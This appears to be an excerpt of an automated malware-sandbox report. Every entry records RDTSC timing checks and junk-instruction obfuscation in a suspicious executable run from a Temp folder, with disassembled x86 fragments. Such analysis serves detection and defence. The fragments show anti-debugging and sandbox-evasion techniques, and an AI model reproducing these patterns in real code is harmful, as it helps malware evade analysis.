Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0305 second address: 4BA0314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0314 second address: 4BA0379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73D4C5760Fh 0x00000009 sub ah, FFFFFFAEh 0x0000000c jmp 00007F73D4C57619h 0x00000011 popfd 0x00000012 jmp 00007F73D4C57610h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test esi, esi 0x0000001c pushad 0x0000001d mov si, 837Dh 0x00000021 mov ebx, ecx 0x00000023 popad 0x00000024 je 00007F74474658BAh 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F73D4C5760Eh 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0379 second address: 4BA037F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA037F second address: 4BA03C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F73D4C57610h 0x00000015 je 00007F7447465889h 0x0000001b jmp 00007F73D4C57610h 0x00000020 mov edx, dword ptr [esi+44h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov esi, ebx 0x00000028 mov eax, ebx 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA03C9 second address: 4BA03FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E052h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F73D4D0E050h 0x00000011 test edx, 61000000h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA03FE second address: 4BA0404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0404 second address: 4BA0444 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F744751C2B2h 0x0000000f jmp 00007F73D4D0E050h 0x00000014 test byte ptr [esi+48h], 00000001h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F73D4D0E04Ah 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0444 second address: 4BA0453 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0453 second address: 4BA0486 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, 71F97098h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007F744751C287h 0x00000013 jmp 00007F73D4D0E057h 0x00000018 test bl, 00000007h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0486 second address: 4BA048C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B908DE second address: 4B908ED instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B908ED second address: 4B90907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57616h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90907 second address: 4B9090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B9090D second address: 4B90911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90911 second address: 4B90930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F73D4D0E054h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90930 second address: 4B90936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90936 second address: 4B9093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B9093A second address: 4B90953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73D4C5760Bh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90953 second address: 4B90957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90957 second address: 4B9095D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B9095D second address: 4B9098F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov si, 843Dh 0x00000011 mov di, si 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F73D4D0E04Bh 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B9098F second address: 4B909A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C57614h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B909A7 second address: 4B909EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F73D4D0E055h 0x00000014 add cx, F516h 0x00000019 jmp 00007F73D4D0E051h 0x0000001e popfd 0x0000001f mov ch, FBh 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov dh, 11h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B909EF second address: 4B90A40 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F73D4C5760Dh 0x00000010 sbb ecx, 1EE3A926h 0x00000016 jmp 00007F73D4C57611h 0x0000001b popfd 0x0000001c mov si, DA57h 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 jmp 00007F73D4C5760Ah 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F73D4C5760Eh 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90A40 second address: 4B90A8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73D4D0E051h 0x00000009 adc si, EBE6h 0x0000000e jmp 00007F73D4D0E051h 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F73D4D0E059h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90A8D second address: 4B90AFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73D4C57617h 0x00000009 xor cx, 2C7Eh 0x0000000e jmp 00007F73D4C57619h 0x00000013 popfd 0x00000014 call 00007F73D4C57610h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov esi, dword ptr [ebp+08h] 0x00000020 jmp 00007F73D4C57611h 0x00000025 sub ebx, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F73D4C5760Ah 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90AFD second address: 4B90B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E04Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90B0F second address: 4B90B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90C36 second address: 4B90C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E059h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90C53 second address: 4B90C93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [77436968h], 00000002h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F73D4C57616h 0x00000018 sub ecx, 18B31738h 0x0000001e jmp 00007F73D4C5760Bh 0x00000023 popfd 0x00000024 mov si, 796Fh 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90C93 second address: 4B90CAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F744752375Eh 0x00000011 pushad 0x00000012 mov eax, 68A85F75h 0x00000017 push eax 0x00000018 push edx 0x00000019 mov ebx, eax 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90CAE second address: 4B90D16 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 21CE82F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov edx, dword ptr [ebp+0Ch] 0x0000000d jmp 00007F73D4C57616h 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 push esi 0x00000015 mov dx, 1210h 0x00000019 pop ebx 0x0000001a mov bl, ch 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007F73D4C57610h 0x00000023 xchg eax, ebx 0x00000024 jmp 00007F73D4C57610h 0x00000029 xchg eax, ebx 0x0000002a jmp 00007F73D4C57610h 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90D16 second address: 4B90D32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E058h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90D32 second address: 4B90D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90D38 second address: 4B90D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90D3C second address: 4B90D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90D40 second address: 4B90D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F73D4D0E059h 0x0000000e push dword ptr [ebp+14h] 0x00000011 jmp 00007F73D4D0E04Eh 0x00000016 push dword ptr [ebp+10h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F73D4D0E04Dh 0x00000021 mov ch, 0Bh 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90DE7 second address: 4B90DF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90DF6 second address: 4B90DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4B90DFC second address: 4B90E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0DE9 second address: 4BA0DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E051h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0B70 second address: 4BA0BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F73D4C5760Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F73D4C5760Eh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0BAD second address: 4BA0BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E04Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0BBF second address: 4BA0BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0BC3 second address: 4BA0BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0BD2 second address: 4BA0BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0BD6 second address: 4BA0BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0BDA second address: 4BA0BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BA0BE0 second address: 4BA0C27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F73D4D0E056h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ecx, ebx 0x00000016 jmp 00007F73D4D0E059h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C2076A second address: 4C2077D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C2077D second address: 4C207A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C207A1 second address: 4C207B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C207B4 second address: 4C207CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E054h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C207CC second address: 4C207D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C207D0 second address: 4C207E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F73D4D0E04Dh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C207E8 second address: 4C207EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C207EE second address: 4C207F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C207F2 second address: 4C20818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov esi, edx 0x0000000c push eax 0x0000000d push edx 0x0000000e call 00007F73D4C57617h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C20818 second address: 4C208AC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F73D4D0E059h 0x00000008 add ax, F946h 0x0000000d jmp 00007F73D4D0E051h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F73D4D0E04Eh 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F73D4D0E04Dh 0x00000027 and ecx, 2FEFF156h 0x0000002d jmp 00007F73D4D0E051h 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007F73D4D0E050h 0x00000039 sbb esi, 7B622378h 0x0000003f jmp 00007F73D4D0E04Bh 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C208AC second address: 4C208C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C57614h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10A63 second address: 4C10A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10A69 second address: 4C10A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10A6D second address: 4C10AAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F73D4D0E04Bh 0x00000011 pushfd 0x00000012 jmp 00007F73D4D0E058h 0x00000017 add ah, FFFFFFB8h 0x0000001a jmp 00007F73D4D0E04Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10AAD second address: 4C10AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F73D4C5760Ah 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10AD8 second address: 4C10AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, 1181ADC7h 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ax, dx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C10AED second address: 4C10AFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C5760Ah 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C108B1 second address: 4C108B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4C108B5 second address: 4C108BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB00EA second address: 4BB00F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB00F0 second address: 4BB00F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB00F6 second address: 4BB00FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB00FA second address: 4BB00FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB00FE second address: 4BB010F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, 21D1h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB010F second address: 4BB0131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57617h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB0131 second address: 4BB0137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB0137 second address: 4BB014B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 5CE5416Eh 0x00000008 mov ecx, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB014B second address: 4BB014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 4BB014F second address: 4BB0155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
